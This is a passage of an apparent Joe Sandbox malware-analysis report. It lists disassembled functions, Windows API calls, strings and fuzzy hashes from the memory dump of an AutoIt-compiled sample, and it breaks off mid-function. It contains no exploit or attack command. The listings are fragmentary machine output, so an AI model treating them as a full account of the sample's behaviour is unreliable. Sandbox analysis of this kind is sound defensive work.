close, xrefs: 00F6A3D1
type cdaudio alias cd wait, xrefs: 00F6A443
set cd door , xrefs: 00F6A466
wait, xrefs: 00F6A482
closed, xrefs: 00F6A3DF, 00F6A3E8

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
API String ID: 2698844021-4113822522
Opcode ID: f945cb9505a977890fc406b6453029e408c0f5391e0510d14c427df9802860ec
Instruction ID: bf314a955d09ede5d21ff412409c1d08ade7ff78192cd5a26b4266bd7a1c4d88
Opcode Fuzzy Hash: f945cb9505a977890fc406b6453029e408c0f5391e0510d14c427df9802860ec
Instruction Fuzzy Hash: 03515D715083059FC700EF11CC8196AB7E8EF84758F50886DF89A672A2DB75ED0AEF52

Function 00F5F8AA Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 138windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,00000000,?,00F3E029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000), ref: 00F5F8DF
LoadStringW.USER32(00000000,?,00F3E029,00000001), ref: 00F5F8E8

Part of subcall function 00F07DE1: _memmove.LIBCMT ref: 00F07E22

GetModuleHandleW.KERNEL32(00000000,00FC5310,?,00000FFF,?,?,00F3E029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000,00000001), ref: 00F5F90A
LoadStringW.USER32(00000000,?,00F3E029,00000001), ref: 00F5F90D
__swprintf.LIBCMT ref: 00F5F95D
__swprintf.LIBCMT ref: 00F5F96E
_wprintf.LIBCMT ref: 00F5FA17
MessageBoxW.USER32(00000000,?,?,00011010), ref: 00F5FA2E

Strings

%s (%d) : ==> %s: %s %s, xrefs: 00F5FA12
Error: , xrefs: 00F5F9E5
^ ERROR, xrefs: 00F5F9C3
Line %d (File "%s"):, xrefs: 00F5F957
Line %d:, xrefs: 00F5F968

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
API String ID: 984253442-2268648507
Opcode ID: 3b690f0cc649a1204529236e3b0afd62b3bbf19ff4e57a83cd1ae9e37508ad74
Instruction ID: cfb69a025264df603af090b4763325a7d5b8998ca9a2934e5d29f66b18c2579a
Opcode Fuzzy Hash: 3b690f0cc649a1204529236e3b0afd62b3bbf19ff4e57a83cd1ae9e37508ad74
Instruction Fuzzy Hash: 31410B7280521DAACF04FBA0DD86DEEB778AF54311F5000A5B605A6091EA396F0DFB61

Function 00F8BA33 Relevance: 22.6, APIs: 15, Instructions: 130filecommemoryCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00F89207,?,?), ref: 00F8BA56
GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00F89207,?,?,00000000,?), ref: 00F8BA6D
GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00F89207,?,?,00000000,?), ref: 00F8BA78
CloseHandle.KERNEL32(00000000,?,?,?,?,00F89207,?,?,00000000,?), ref: 00F8BA85
GlobalLock.KERNEL32(00000000), ref: 00F8BA8E
ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,00F89207,?,?,00000000,?), ref: 00F8BA9D
GlobalUnlock.KERNEL32(00000000), ref: 00F8BAA6
CloseHandle.KERNEL32(00000000,?,?,?,?,00F89207,?,?,00000000,?), ref: 00F8BAAD
CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00F89207,?,?,00000000,?), ref: 00F8BABE
OleLoadPicture.OLEAUT32(?,00000000,00000000,00F92CAC,?), ref: 00F8BAD7
GlobalFree.KERNEL32(00000000), ref: 00F8BAE7
GetObjectW.GDI32(00000000,00000018,?), ref: 00F8BB0B
CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 00F8BB36
DeleteObject.GDI32(00000000), ref: 00F8BB5E
SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00F8BB74

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
String ID:
API String ID: 3840717409-0
Opcode ID: 18276eeaba29cf66fbfbf82fa61f1ec0729bc2a6b29b7694844279ca92f8ff3c
Instruction ID: 654ee0425d4361f0f457a84c84eff9fa19d076086f97a8d9ae0417b35d5acc14
Opcode Fuzzy Hash: 18276eeaba29cf66fbfbf82fa61f1ec0729bc2a6b29b7694844279ca92f8ff3c
Instruction Fuzzy Hash: 6E410875600208AFDB119F65DC88EFA7BB8EB89B21F104069F906D7260D7349905EB60

Function 00F6D899 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 230COMMON

Download Yara Rule

APIs

__wsplitpath.LIBCMT ref: 00F6DA10
_wcscat.LIBCMT ref: 00F6DA28
_wcscat.LIBCMT ref: 00F6DA3A
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00F6DA4F
SetCurrentDirectoryW.KERNEL32(?), ref: 00F6DA63
GetFileAttributesW.KERNEL32(?), ref: 00F6DA7B
SetFileAttributesW.KERNEL32(?,00000000), ref: 00F6DA95
SetCurrentDirectoryW.KERNEL32(?), ref: 00F6DAA7

Strings

*.*, xrefs: 00F6DAE6

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
String ID: *.*
API String ID: 34673085-438819550
Opcode ID: cc760a2d31afe6e5315ec8024dad517bf6c5ca74171de5df7c9d224e614ec556
Instruction ID: 9c9b4d62a58585f55cb98b3567b05aab45628b6ac3e33598fbe5b6642a8cba87
Opcode Fuzzy Hash: cc760a2d31afe6e5315ec8024dad517bf6c5ca74171de5df7c9d224e614ec556
Instruction Fuzzy Hash: 94819572E083459FCB24DF64C844A6AB7E4BF89364F188C2EF489CB251E734D945EB52

Function 00F8C1AC Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00F02612: GetWindowLongW.USER32(?,000000EB), ref: 00F02623

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00F8C1FC
GetFocus.USER32 ref: 00F8C20C
GetDlgCtrlID.USER32(00000000), ref: 00F8C217
_memset.LIBCMT ref: 00F8C342
GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00F8C36D
GetMenuItemCount.USER32(?), ref: 00F8C38D
GetMenuItemID.USER32(?,00000000), ref: 00F8C3A0
GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00F8C3D4
GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00F8C41C
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00F8C454
DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 00F8C489

Strings

0, xrefs: 00F8C33A

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
String ID: 0
API String ID: 1296962147-4108050209
Opcode ID: 1f5dbd52e112f09ef9600d65aa2fd7a67fffc9e18ae3f4fce1110e5b36134c50
Instruction ID: d2c7a9ce54bbef388b470fe19cb1ca44c2e52708b4fa971aabc0f52222bf9933
Opcode Fuzzy Hash: 1f5dbd52e112f09ef9600d65aa2fd7a67fffc9e18ae3f4fce1110e5b36134c50
Instruction Fuzzy Hash: 8C818D71608305AFD710EF14CC94ABBBBE4FB88724F00492DF99597291D770D945EBA2

Function 00F7731A Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00F7738F
CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00F7739B
CreateCompatibleDC.GDI32(?), ref: 00F773A7
SelectObject.GDI32(00000000,?), ref: 00F773B4
StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00F77408
GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00F77444
GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00F77468
SelectObject.GDI32(00000006,?), ref: 00F77470
DeleteObject.GDI32(?), ref: 00F77479
DeleteDC.GDI32(00000006), ref: 00F77480
ReleaseDC.USER32(00000000,?), ref: 00F7748B

Strings

(, xrefs: 00F77410

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
String ID: (
API String ID: 2598888154-3887548279
Opcode ID: fab1ac3d80f87788799c2681f7b7620b439f8124ccc32b21e373c6e70c2a2da3
Instruction ID: 74367d22612bf77f4f8ecce7ddd97f3b1618bbb552d0607eb0bec0f06216e1d7
Opcode Fuzzy Hash: fab1ac3d80f87788799c2681f7b7620b439f8124ccc32b21e373c6e70c2a2da3
Instruction Fuzzy Hash: AE515A76904309EFCB14DFA8CC84EAEBBB9EF48310F14852EF95A97211D731A944EB50

Function 00F06A8C Relevance: 19.7, APIs: 4, Strings: 7, Instructions: 478COMMON

Download Yara Rule

APIs

Part of subcall function 00F20957: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00F06B0C,?,00008000), ref: 00F20973

Part of subcall function 00F04750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00F04743,?,?,00F037AE,?), ref: 00F04770

SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00F06BAD
SetCurrentDirectoryW.KERNEL32(?), ref: 00F06CFA

Part of subcall function 00F0586D: _wcscpy.LIBCMT ref: 00F058A5

Part of subcall function 00F2363D: _iswctype.LIBCMT ref: 00F23645

Strings

Unterminated string, xrefs: 00F3E7E4
EA06, xrefs: 00F3E452
Error opening the file, xrefs: 00F3E43D, 00F3E4B8
Bad directive syntax error, xrefs: 00F3E79D
>>>AUTOIT SCRIPT<<<, xrefs: 00F3E496
AU3!, xrefs: 00F06B61
#include depth exceeded. Make sure there are no recursive includes, xrefs: 00F3E421

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
API String ID: 537147316-1018226102
Opcode ID: 523d1d1721afd410fd88c3d51dfd38b0a56e68268c24dd46d197deb239cb5208
Instruction ID: de1d22ec93a19ccfc87626c60756721278d02e68bd48ae27fd1d8bfc57d2f31e
Opcode Fuzzy Hash: 523d1d1721afd410fd88c3d51dfd38b0a56e68268c24dd46d197deb239cb5208
Instruction Fuzzy Hash: F502AC315083419FC724EF20CC81AAFBBE5AF98324F14491DF496972A2DB74E949FB52

Function 00F62D36 Relevance: 19.7, APIs: 13, Instructions: 214windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00F62D50
GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00F62DDD
GetMenuItemCount.USER32(00FC5890), ref: 00F62E66
DeleteMenu.USER32(00FC5890,00000005,00000000,000000F5,?,?), ref: 00F62EF6
DeleteMenu.USER32(00FC5890,00000004,00000000), ref: 00F62EFE
DeleteMenu.USER32(00FC5890,00000006,00000000), ref: 00F62F06
DeleteMenu.USER32(00FC5890,00000003,00000000), ref: 00F62F0E
GetMenuItemCount.USER32(00FC5890), ref: 00F62F16
SetMenuItemInfoW.USER32(00FC5890,00000004,00000000,00000030), ref: 00F62F4C
GetCursorPos.USER32(?), ref: 00F62F56
SetForegroundWindow.USER32(00000000), ref: 00F62F5F
TrackPopupMenuEx.USER32(00FC5890,00000000,?,00000000,00000000,00000000), ref: 00F62F72
PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00F62F7E

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
String ID:
API String ID: 3993528054-0
Opcode ID: 23d8e34c33ea15a93c4046e42d85358e86c61a682a8155d98c543df2d453efe1
Instruction ID: d7a0b813503a7c54ad10e49e5e12ba6f267d3deedc3e6fc25e38dfee96b52330
Opcode Fuzzy Hash: 23d8e34c33ea15a93c4046e42d85358e86c61a682a8155d98c543df2d453efe1
Instruction Fuzzy Hash: 67710671A01A09BFEB619F54DC49FAABF64FF04324F140226F615AA1E0C7766C10F791

Function 00F577DC Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 128registryshareCOMMON

Download Yara Rule

APIs

Part of subcall function 00F07BCC: _memmove.LIBCMT ref: 00F07C06

_memset.LIBCMT ref: 00F5786B
WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00F578A0
RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00F578BC
RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00F578D8
RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00F57902
CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 00F5792A
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00F57935
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00F5793A

Strings

\IPC$, xrefs: 00F57882
\CLSID, xrefs: 00F57822
SOFTWARE\Classes\, xrefs: 00F5780C

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
String ID: SOFTWARE\Classes\$\CLSID$\IPC$
API String ID: 1411258926-22481851
Opcode ID: c2f0d708607973abc3d24373897487d1768827b904653ebd9467e1efe8200116
Instruction ID: 299f9361fad9b50a0120d2a9dbbfa3d85628923d30b08b2d5e342255e7b58de9
Opcode Fuzzy Hash: c2f0d708607973abc3d24373897487d1768827b904653ebd9467e1efe8200116
Instruction Fuzzy Hash: 2A41F672C1422DAEDF11FBA4EC85DEEB778BF04711B504069E905A21A1DA35AD08EBA0

Function 00F80E1A Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 120COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,?,?,?,?,00F7FDAD,?,?), ref: 00F80E31

Strings

HKCC, xrefs: 00F80EFF
HKU, xrefs: 00F80F43
HKEY_CURRENT_CONFIG, xrefs: 00F80EEE
HKEY_USERS, xrefs: 00F80F32
HKEY_CLASSES_ROOT, xrefs: 00F80EC4
HKLM, xrefs: 00F80EAF
HKEY_LOCAL_MACHINE, xrefs: 00F80E9A
HKCU, xrefs: 00F80F21
HKCR, xrefs: 00F80ED9
HKEY_CURRENT_USER, xrefs: 00F80F10

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: BuffCharUpper
String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
API String ID: 3964851224-909552448
Opcode ID: 7d5034cf38f59f4bf4fe4b1aafb8ee760afe8227f80ad97c91e1279e554c0167
Instruction ID: e52e329581d4684bfdc0d4e4af75e4e78296d979c6ecf0392cef37ee56cb2e82
Opcode Fuzzy Hash: 7d5034cf38f59f4bf4fe4b1aafb8ee760afe8227f80ad97c91e1279e554c0167
Instruction Fuzzy Hash: 6D41283250425A8BCF60FF10EC95AEE3764EF11314F948464FE651B292DF78A91AFB60

Function 00F5F7A1 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 75windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00F3E2A0,00000010,?,Bad directive syntax error,00F8F910,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 00F5F7C2
LoadStringW.USER32(00000000,?,00F3E2A0,00000010), ref: 00F5F7C9

Part of subcall function 00F07DE1: _memmove.LIBCMT ref: 00F07E22

_wprintf.LIBCMT ref: 00F5F7FC
__swprintf.LIBCMT ref: 00F5F81E
MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00F5F88D

Strings

%s (%d) : ==> %s.: %s %s, xrefs: 00F5F7F7
., xrefs: 00F5F873
Line %d (File "%s"):, xrefs: 00F5F833
Error: , xrefs: 00F5F85B
Line %d:, xrefs: 00F5F818

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
API String ID: 1506413516-4153970271
Opcode ID: 2a5a496bef192530a743e177864311876c047f502fbc8bdbccc1776478e0aacf
Instruction ID: e3b199691a2414ffd1e7a5ba84e8d96035691cf73d1cf300f8ccf9fc59a9341f
Opcode Fuzzy Hash: 2a5a496bef192530a743e177864311876c047f502fbc8bdbccc1776478e0aacf
Instruction Fuzzy Hash: 1E215C7290021EBFCF11EF90DC0AEEE7739BF18301F0444A5B515660A1EA75AA18FB51

Function 00F652C7 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 74COMMON

Download Yara Rule

APIs

Part of subcall function 00F07BCC: _memmove.LIBCMT ref: 00F07C06

Part of subcall function 00F07924: _memmove.LIBCMT ref: 00F079AD

mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00F65330
mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00F65346
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00F65357
mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00F65369
mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00F6537A

Strings

open , xrefs: 00F652DF
close PlayMe, xrefs: 00F65341, 00F6536E
status PlayMe mode, xrefs: 00F6532B
play PlayMe wait, xrefs: 00F65364
alias PlayMe, xrefs: 00F65309
play PlayMe, xrefs: 00F65375

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: SendString$_memmove
String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
API String ID: 2279737902-1007645807
Opcode ID: a2984fc72297aaea265906190d92ddc59da3d4669141ad93abfca183b07dbcf4
Instruction ID: 059a53b04110848c90828322628eab42f32d36ffa2bc2b5fc9c8ec36c6148caf
Opcode Fuzzy Hash: a2984fc72297aaea265906190d92ddc59da3d4669141ad93abfca183b07dbcf4
Instruction Fuzzy Hash: BA11B231E5026979D720B662CC4ADFFBB7CEBD1F94F100469B401A20D1EEA05D06EAA1

Function 00F646B7 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 73networkCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 00F646D2
gethostname.WSOCK32(?,00000100), ref: 00F646EC
gethostbyname.WSOCK32(?), ref: 00F646F9
_wcscpy.LIBCMT ref: 00F64721
_memmove.LIBCMT ref: 00F64734
inet_ntoa.WSOCK32(?), ref: 00F6473F
_strcat.LIBCMT ref: 00F6474D
_wcscpy.LIBCMT ref: 00F64764
WSACleanup.WSOCK32 ref: 00F64772
_wcscpy.LIBCMT ref: 00F64780

Strings

0.0.0.0, xrefs: 00F6471B

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
String ID: 0.0.0.0
API String ID: 208665112-3771769585
Opcode ID: 4efc89ae5476071c20e717383533da5c48e8d89a7b610ee543ac9c2d21c6a9f3
Instruction ID: 840a6ddee0abec26b15e2a1ba2009da937244aac5e321a0b5dbf393e40e8651e
Opcode Fuzzy Hash: 4efc89ae5476071c20e717383533da5c48e8d89a7b610ee543ac9c2d21c6a9f3
Instruction Fuzzy Hash: 8711C332900118AFDB10BB30AC46EEE77ACEB01721F0401B6F44596091EF749985AB51

Function 00F64F75 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 00F64F7A

Part of subcall function 00F2049F: timeGetTime.WINMM(?,75A8B400,00F10E7B), ref: 00F204A3

Sleep.KERNEL32(0000000A), ref: 00F64FA6
EnumThreadWindows.USER32(?,Function_00064F28,00000000), ref: 00F64FCA
